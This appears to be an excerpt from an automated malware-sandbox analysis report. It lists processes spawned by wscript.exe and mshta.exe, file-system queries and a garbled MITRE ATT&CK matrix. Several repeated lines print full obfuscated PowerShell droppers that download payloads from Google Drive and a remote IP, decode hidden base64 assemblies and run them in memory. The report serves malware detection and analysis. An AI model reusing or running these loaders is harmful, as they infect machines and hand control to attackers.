va2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') ( (('g2nimageurl = m87https://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvu'+'hbywur m87;g2nwebclient = new-object system.net.webclient;g2nimagebytes = g2nwebclient.downloaddata(g2nimageurl);g2nimage'+'text = [system.text.encodi'+'ng]::utf8.getstring(g2nimagebyte'+'s);g2nstartflag = m87<<base64_start>>m87;g2nendflag = m87<<base64_end>>m'+'87;g2nstartindex'+' = '+'g2nim'+'agetext.indexof(g2nstartflag);g2nendindex = g2nimagetext'+'.indexof'+'(g2nendflag);g2nstartind'+'ex '+'-ge 0 -and'+' g2nendindex -gt g2nstartindex;g2nstartindex += g2nstartflag.le'+'ngth;g2nbase64length = g2nendindex - g2nstartindex;g2nbase64c'+'ommand = g2nimagetext.'+'substring(g2nst'+'artin'+'dex, g2nbase64leng'+'th);g2nbase64reve'+'rsed = -join'+' (g2nb'+'ase64command.tochararray() '+'cik foreach-object { g2n_ })[-1..-(g2nbase64command.length)]'+';g2ncommandbytes = [system.convert]::f'+'rombase64string(g2nbase64reversed);g2nloadedassemb'+'ly = '+'[syst'+'em.reflection.as'+'sembly]::load(g2ncommandbytes);g2nvaimethod = [dnlib.io.home].getmethod(m87vaim87);g2nvaimethod.invoke(g2nnull, @(m87txt.rdffre'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87addinprocess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -replace([char]71+[char]50+[char]78),[char]36-replace'm87',[char]39-creplace ([char]67+[char]73+[char]75),[char]124) )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgjxbelewuqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfkzc1uevbficagicagicagicagicagicagicagicagicagicagicattwvnqmvyrevmaw5pdelpbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbydhjishmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbubgnylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagr3l2cix1aw50icagicagicagicagicagicagicagicagicagicagicb1leludfb0ciagicagicagicagicagicagicagicagicagicagicagqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicjicsigicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bhq0ugicagicagicagicagicagicagicagicagicagicagifpyysagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgjxbelewuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumjewljixns44lzu0mc9jcmvhdgvkymvzdhroaw5nc3dpdghuawnld29ya2dyzwf0ac50suyilcikrw5wokfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmildasmck7u1rhulqtc0xlzvaomyk7c3rbclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmi'+[char]0x22+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnzva2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') ( (('g2nimageurl = m87https://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvu'+'hbywur m87;g2nwebclient = new-object system.net.webclient;g2nimagebytes = g2nwebclient.downloaddata(g2nimageurl);g2nimage'+'text = [system.text.encodi'+'ng]::utf8.getstring(g2nimagebyte'+'s);g2nstartflag = m87<<base64_start>>m87;g2nendflag = m87<<base64_end>>m'+'87;g2nstartindex'+' = '+'g2nim'+'agetext.indexof(g2nstartflag);g2nendindex = g2nimagetext'+'.indexof'+'(g2nendflag);g2nstartind'+'ex '+'-ge 0 -and'+' g2nendindex -gt g2nstartindex;g2nstartindex += g2nstartflag.le'+'ngth;g2nbase64length = g2nendindex - g2nstartindex;g2nbase64c'+'ommand = g2nimagetext.'+'substring(g2nst'+'artin'+'dex, g2nbase64leng'+'th);g2nbase64reve'+'rsed = -join'+' (g2nb'+'ase64command.tochararray() '+'cik foreach-object { g2n_ })[-1..-(g2nbase64command.length)]'+';g2ncommandbytes = [system.convert]::f'+'rombase64string(g2nbase64reversed);g2nloadedassemb'+'ly = '+'[syst'+'em.reflection.as'+'sembly]::load(g2ncommandbytes);g2nvaimethod = [dnlib.io.home].getmethod(m87vaim87);g2nvaimethod.invoke(g2nnull, @(m87txt.rdffre'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87addinprocess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -replace([char]71+[char]50+[char]78),[char]36-replace'm87',[char]39-creplace ([char]67+[char]73+[char]75),[char]124) )"Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgjxbelewuqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfkzc1uevbficagicagicagicagicagicagicagicagicagicagicattwvnqmvyrevmaw5pdelpbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbydhjishmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbubgnylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagr3l2cix1aw50icagicagicagicagicagicagicagicagicagicagicb1leludfb0ciagicagicagicagicagicagicagicagicagicagicagqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicjicsigicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bhq0ugicagicagicagicagicagicagicagicagicagicagifpyysagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgjxbelewuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumjewljixns44lzu0mc9jcmvhdgvkymvzdhroaw5nc3dpdghuawnld29ya2dyzwf0ac50suyilcikrw5wokfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmildasmck7u1rhulqtc0xlzvaomyk7c3rbclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmi'+[char]0x22+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnzva2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') ( (('g2nimageurl = m87https://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvu'+'hbywur m87;g2nwebclient = new-object system.net.webclient;g2nimagebytes = g2nwebclient.downloaddata(g2nimageurl);g2nimage'+'text = [system.text.encodi'+'ng]::utf8.getstring(g2nimagebyte'+'s);g2nstartflag = m87<<base64_start>>m87;g2nendflag = m87<<base64_end>>m'+'87;g2nstartindex'+' = '+'g2nim'+'agetext.indexof(g2nstartflag);g2nendindex = g2nimagetext'+'.indexof'+'(g2nendflag);g2nstartind'+'ex '+'-ge 0 -and'+' g2nendindex -gt g2nstartindex;g2nstartindex += g2nstartflag.le'+'ngth;g2nbase64length = g2nendindex - g2nstartindex;g2nbase64c'+'ommand = g2nimagetext.'+'substring(g2nst'+'artin'+'dex, g2nbase64leng'+'th);g2nbase64reve'+'rsed = -join'+' (g2nb'+'ase64command.tochararray() '+'cik foreach-object { g2n_ })[-1..-(g2nbase64command.length)]'+';g2ncommandbytes = [system.convert]::f'+'rombase64string(g2nbase64reversed);g2nloadedassemb'+'ly = '+'[syst'+'em.reflection.as'+'sembly]::load(g2ncommandbytes);g2nvaimethod = [dnlib.io.home].getmethod(m87vaim87);g2nvaimethod.invoke(g2nnull, @(m87txt.rdffre'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87addinprocess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -replace([char]71+[char]50+[char]78),[char]36-replace'm87',[char]39-creplace ([char]67+[char]73+[char]75),[char]124) )"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information121
      Scripting      		Valid Accounts121
      Command and Scripting Interpreter      		121
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote Services1
      Email Collection      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts23
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
